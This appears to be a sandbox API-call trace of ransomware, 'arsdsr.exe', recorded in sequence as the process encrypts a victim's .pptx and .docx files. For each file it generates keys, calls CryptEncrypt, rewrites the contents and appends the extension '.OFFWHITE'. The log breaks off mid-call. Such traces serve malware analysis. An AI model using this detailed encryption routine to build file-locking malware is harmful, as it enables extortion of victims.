0 [0134.311] PathFindExtensionW (pszPath="x3OIQRAcNV5 6d.pptx") returned=".pptx" [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0134.311] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0134.311] lstrcmpiW (lpString1="x3OIQRAcNV5 6d.pptx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.311] GetProcessHeap () returned 0x500000 [0134.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f868 [0134.312] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3oiqracnv5 6d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.313] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=52542) returned 1 [0134.313] GetProcessHeap () returned 0x500000 [0134.313] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.313] GetProcessHeap () returned 0x500000 [0134.313] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.313] GetProcessHeap () returned 0x500000 [0134.313] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.313] GetProcessHeap () returned 0x500000 [0134.313] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.313] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.313] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.313] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.313] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.313] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.313] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.313] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.313] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.314] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.314] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.314] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.314] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.314] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xcd3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.314] SetLastError (dwErrCode=0x0) [0134.314] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.332] GetLastError () returned 0x0 [0134.332] GetLastError () returned 0x0 [0134.332] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xce3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.332] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.332] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xcf3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.332] WriteFile (in: hFile=0xb0, lpBuffer=0x53f868*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f868*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.332] GetProcessHeap () returned 0x500000 [0134.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xcd3e) returned 0x55a7b8 [0134.332] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.332] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xcd3e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xcd3e, lpOverlapped=0x0) returned 1 [0134.336] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.336] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xcd3e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xcd3e, lpOverlapped=0x0) returned 1 [0134.337] GetProcessHeap () returned 0x500000 [0134.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.337] CloseHandle (hObject=0xb0) returned 1 [0134.341] GetProcessHeap () returned 0x500000 [0134.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.341] GetProcessHeap () returned 0x500000 [0134.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.341] GetProcessHeap () returned 0x500000 [0134.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.341] GetProcessHeap () returned 0x500000 [0134.341] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.341] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx" [0134.341] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx.OFFWHITE" [0134.341] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3oiqracnv5 6d.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x3OIQRAcNV5 6d.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x3oiqracnv5 6d.pptx.offwhite")) returned 1 [0134.343] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06ac640, ftCreationTime.dwHighDateTime=0x1d5ba58, ftLastAccessTime.dwLowDateTime=0xf24b1f00, ftLastAccessTime.dwHighDateTime=0x1d595e0, ftLastWriteTime.dwLowDateTime=0xf24b1f00, ftLastWriteTime.dwHighDateTime=0x1d595e0, nFileSizeHigh=0x0, nFileSizeLow=0x533f, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="xz5sGvyKz.docx", cAlternateFileName="XZ5SGV~1.DOC")) returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2=".") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="..") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="...") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="windows") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="$recycle.bin") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="rsa") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="ntuser.dat") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="programdata") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="appdata") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="program files") returned 1 [0134.343] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="program files (x86)") returned 1 [0134.343] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.343] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="xz5sGvyKz.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx" [0134.343] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.343] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.343] PathFindExtensionW (pszPath="xz5sGvyKz.docx") returned=".docx" [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0134.343] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0134.344] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0134.344] lstrcmpiW (lpString1="xz5sGvyKz.docx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.344] GetProcessHeap () returned 0x500000 [0134.344] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531750 [0134.344] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xz5sgvykz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.345] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=21311) returned 1 [0134.345] GetProcessHeap () returned 0x500000 [0134.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.345] GetProcessHeap () returned 0x500000 [0134.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.345] GetProcessHeap () returned 0x500000 [0134.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.345] GetProcessHeap () returned 0x500000 [0134.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.345] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.345] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.345] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.346] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.346] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.346] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.346] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x533f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.346] SetLastError (dwErrCode=0x0) [0134.346] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.348] GetLastError () returned 0x0 [0134.348] GetLastError () returned 0x0 [0134.348] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x543f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.348] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.348] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x553f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.349] WriteFile (in: hFile=0xb0, lpBuffer=0x531750*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531750*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.349] GetProcessHeap () returned 0x500000 [0134.349] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x533f) returned 0x55a7b8 [0134.349] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.349] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x533f, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x533f, lpOverlapped=0x0) returned 1 [0134.351] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.351] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x533f, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x533f, lpOverlapped=0x0) returned 1 [0134.351] GetProcessHeap () returned 0x500000 [0134.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.351] CloseHandle (hObject=0xb0) returned 1 [0134.358] GetProcessHeap () returned 0x500000 [0134.358] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.358] GetProcessHeap () returned 0x500000 [0134.358] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.358] GetProcessHeap () returned 0x500000 [0134.358] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.358] GetProcessHeap () returned 0x500000 [0134.358] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.358] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx" [0134.358] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx.OFFWHITE" [0134.359] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xz5sgvykz.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xz5sGvyKz.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xz5sgvykz.docx.offwhite")) returned 1 [0134.360] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8eade10, ftCreationTime.dwHighDateTime=0x1d55e62, ftLastAccessTime.dwLowDateTime=0xdfd4bf0, ftLastAccessTime.dwHighDateTime=0x1d55ad7, ftLastWriteTime.dwLowDateTime=0xdfd4bf0, ftLastWriteTime.dwHighDateTime=0x1d55ad7, nFileSizeHigh=0x0, nFileSizeLow=0x11203, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="ZE64.docx", cAlternateFileName="ZE64~1.DOC")) returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2=".") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="..") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="...") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="windows") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="$recycle.bin") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="rsa") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="ntuser.dat") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="programdata") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="appdata") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="program files") returned 1 [0134.360] lstrcmpiW (lpString1="ZE64.docx", lpString2="program files (x86)") returned 1 [0134.360] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.360] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="ZE64.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx" [0134.360] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.360] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.360] PathFindExtensionW (pszPath="ZE64.docx") returned=".docx" [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0134.360] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0134.361] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0134.361] lstrcmpiW (lpString1="ZE64.docx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.361] GetProcessHeap () returned 0x500000 [0134.361] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531760 [0134.361] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ze64.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.362] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=70147) returned 1 [0134.362] GetProcessHeap () returned 0x500000 [0134.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.362] GetProcessHeap () returned 0x500000 [0134.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.362] GetProcessHeap () returned 0x500000 [0134.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.362] GetProcessHeap () returned 0x500000 [0134.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.362] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.362] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.362] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.362] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.362] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.362] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.362] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.362] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.362] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.363] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.363] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.363] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.363] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11203, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.363] SetLastError (dwErrCode=0x0) [0134.363] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.369] GetLastError () returned 0x0 [0134.369] GetLastError () returned 0x0 [0134.369] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11303, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.369] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.369] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11403, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.369] WriteFile (in: hFile=0xb0, lpBuffer=0x531760*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531760*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.369] GetProcessHeap () returned 0x500000 [0134.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x11203) returned 0x55a7b8 [0134.369] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.369] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x11203, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x11203, lpOverlapped=0x0) returned 1 [0134.375] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.375] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, 